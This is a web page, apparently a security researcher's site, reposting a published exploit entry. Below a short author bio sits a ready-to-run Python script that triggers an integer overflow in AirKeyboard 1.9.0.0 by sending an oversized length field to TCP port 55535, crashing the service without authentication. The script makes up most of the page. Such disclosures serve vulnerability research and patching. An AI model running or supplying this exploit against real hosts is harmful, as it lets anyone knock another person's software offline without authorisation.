Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

# Exploit Title: AirKeyboard 1.9.0.0 Integer Overflow to Remote Denial # Exploit Title: AirKeyboard 1.9.0.0 Integer Overflow to Remote Denial of
Service (DoS)
# Date: 2025-06-14
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://www.airkeyboardapp.com/
# Software Link: http://www.airkeyboardapp.com/download?os=Windows
# Version: 1.9.0.0
# Tested on: Windows 10/11

#!/usr/bin/env python3
'''
AirKeyboard 1.9.0.0 suffers from an integer overflow vulnerability in its
TCP request handler. The ReadLength method parses a 4-byte user-supplied
length field without bounds checking, allowing attackers to trigger a
denial-of-service by sending a malformed packet with an oversized length
value. Exploitation requires no authentication and affects the default TCP
port (55535).
'''

import socket
import struct


target_ip = "192.168.8.105"
target_port = 55535


overflow_length = 0xFFFFFFFFFFFFFFFF


body = b"A" * 8


payload = struct.pack("<Q", overflow_length) + body

print(f"[+] Sending packet to {target_ip}:{target_port}")


with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target_ip, target_port))
s.sendall(payload)

print("[+] Payload sent..")
Social Media Share